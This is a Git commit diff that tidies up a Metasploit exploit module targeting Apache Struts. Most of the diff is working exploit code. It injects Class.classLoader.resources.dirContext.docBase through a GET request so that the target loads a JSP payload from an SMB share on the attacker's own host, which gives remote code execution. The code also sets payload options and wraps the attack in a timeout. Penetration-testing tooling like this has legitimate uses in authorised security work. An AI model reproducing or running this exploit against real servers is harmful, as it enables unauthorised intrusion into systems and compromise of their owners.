Do some module cleanup

kernelsmith · Mar 5, 2015 · de08d82 · de08d82
1 parent 82659ab
commit de08d82
Showing 1 changed file with 23 additions and 25 deletions.
diff --git a/modules/exploits/windows/http/struts_http_jspinject.rb b/modules/exploits/windows/http/struts_http_jspinject.rb
@@ -29,30 +29,31 @@ def initialize(info={})
         ],
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'process',
-          'DisablePayloadHandler' => 'false',
+          'EXITFUNC' => 'process'
+        },
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
         },
       'Privileged'     => true,
       'Arch'           => ARCH_JAVA,
-      'Platform'       => [ 'win' ],
+      'Platform'       => 'win',
+      'Stance'         => Msf::Exploit::Stance::Aggressive,
       'Targets'        =>
-      [
-        [ 'Java Universal',
-          {
-          'Arch' => ARCH_JAVA,
-          'Platform' => ['win','linux']
-          },
-        ]
-      ],
+        [
+          ['Java Universal', {}]
+        ],
       'DefaultTarget'  => 0,
     ))
 
     register_options(
       [
-        OptString.new('URI',      [true,  'Path to vulnerable Struts action file', '/struts2-blank/example/HelloWorld.action', true ]),
+        OptString.new('TARGETURI', [true, 'Path to vulnerable Struts action file', '/struts2-blank/example/HelloWorld.action']),
         OptString.new('FILE_NAME', [ true, 'A static JSP name', 'HelloWorld.jsp']),
         OptString.new('FOLDER_NAME', [ true, 'A static Folder', 'example']),
         OptString.new('SHARE', [ true, 'Share', 'share']),
+        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10]),
         Opt::RPORT(8080)
       ], self.class)
 
@@ -73,26 +74,23 @@ def check
   def primer
     self.file_contents = payload.encoded
     print_status("File available on #{unc}...")
-    share = "#{unc}"
-    sploit = datastore['URI']
-    share = share.gsub(/\\/, '/')
-    #sploit << '?class.classLoader.resources.dirContext.docBase='
+
+    sploit = target_uri.to_s
     sploit << '?Class.classLoader.resources.dirContext.docBase='
-    #sploit << '?Class.classLoader.resources.context.effectiveMajorVersion='
-    #sploit << "?class['classLoader']['resources']['dirContext']['docBase']="
-    sploit << share
+    sploit << "\\\\#{srvhost}\\#{share}"
     print_status("Injecting JSP to #{datastore['RHOST']}:#{datastore['RPORT']} - #{sploit}")
 
-    res = send_request_raw({
+    send_request_raw({
       'method' => 'GET',
       'uri' => sploit
     }, 30)
+  end
 
-    # Wait 30 seconds for session to be created
-    1.upto(30) do
-      break if session_created?
-      sleep(1)
+  def exploit
+    begin
+      Timeout.timeout(datastore['SMB_DELAY']) {super}
+    rescue Timeout::Error
+      # do nothing... just finish exploit and stop smb server...
     end
-    disconnect
   end
 end